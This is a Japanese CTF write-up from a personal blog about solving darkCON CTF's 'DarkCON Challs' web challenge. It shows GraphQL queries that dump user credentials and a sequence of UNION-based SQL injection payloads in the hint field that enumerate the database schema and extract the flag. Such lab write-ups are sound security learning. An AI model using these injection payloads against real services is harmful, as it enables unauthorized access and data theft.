はまやんはまやんはまやん

hamayanhamayan's blog

DarkCON Challs [darkCON CTF]

Security

競プロのコード例について補足 競技プログラミング練習問題集 Twitter 競技セキュリティまとめのまとめ

CTFtime.org / darkCON CTF

以下が認証プロセス。 GraphQLが使われているので、とりあえずいつもの抜き出しを行う。

function auth() {
    var username = document.getElementById("Username").value;
    var password = document.getElementById("Password").value;
    var head = btoa(username + ':' + password);
    $(document).ready(function() {
        $.post("graphql", {
            "query": "mutation{login(username:\"" + username + "\",password:\"" + password + "\")}"
        }, function(data, textStatus) {
            if (data.data.login == "Success") {
                document.cookie = "auth=" + head;
                window.location = '/dashboard'
            } else {
                alert('Wrong creds')
            }
            ;
        }, "json");
    });
}
function yeet() {
    document.cookie = "auth=Z3Vlc3Q6a2FybWE5ODc0";
    window.location = "/dashboard"
}

mutation{login(username:"admin",password:"password")}

query{Challs{}}
-> Authorization Error

query{allUsers{username password}}
-> 
{"data":{"allUsers":[{"username":"guest","password":"karma9874"},{"username":"admin","password":"is_this_visible_to_you?"}]}}
ok.

adminパスワードが抜けたので、とりあえずログインしてみる。 admin権限が得られたので、改めてGraphQLを操作してみる。

query{Challs{id title flag{chall_flag}}}
->
{"id":"35","title":"DarkCON Challs","flag":{"chall_flag":"<REDACTED>"}

Try Harderか…

query{Challs{id title description category author points flag{chall_id chall_title chall_flag}}}
->
{"id":"35","title":"DarkCON Challs","description":"\"A place where you can see all the challs of darkCON CTF using api but not the flag or can you @_@ ?\r\nPS :- Try to get the flag of this chall xD\"","category":"Web","author":"Karma","points":500,"flag":{"chall_id":"35","chall_title":"DarkCON Challs","chall_flag":"<REDACTED>"}}

んー…

query{hint(chall_id:"35"){chall_id chall_title take_hint}}
-> 特に…

いや、SQLiか?

query{hint(chall_id:"x"){chall_id chall_title take_hint}}
-> ER_BAD_FIELD_ERROR: Unknown column 'x' in 'where clause'

query{hint(chall_id:"'"){chall_id chall_title take_hint}}
ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

キタキタキタ。

query{hint(chall_id:"-1 union select 1,2,3"){chall_id chall_title take_hint}}

これで1,2,3と出力されるようになった。OK

query{hint(chall_id:"-1 union SELECT GROUP_CONCAT(distinct TABLE_SCHEMA),2,3 FROM INFORMATION_SCHEMA.TABLES"){chall_id chall_title take_hint}}
-> darkcon,information_schema,mysql,performance_schema,sys

query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct table_name),2,3 from information_schema.tables where TABLE_SCHEMA='darkcon'"){chall_id chall_title take_hint}}
-> challs,flags,hints,users

query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='challs'"){chall_id chall_title take_hint}}
-> challs: id,category,title,description,author,points

query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='flags'"){chall_id chall_title take_hint}}
-> flags: chall_id,chall_title,chall_flag

query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct chall_flag),2,3 from flags"){chall_id chall_title take_hint}}
-> darkCON{fake_flag},darkCON{w0ww_y0u_re411y_f0und_m3}

提出できんかったけど、これはあってるやろ。 ok. darkCON{w0ww_y0u_re411y_f0und_m3}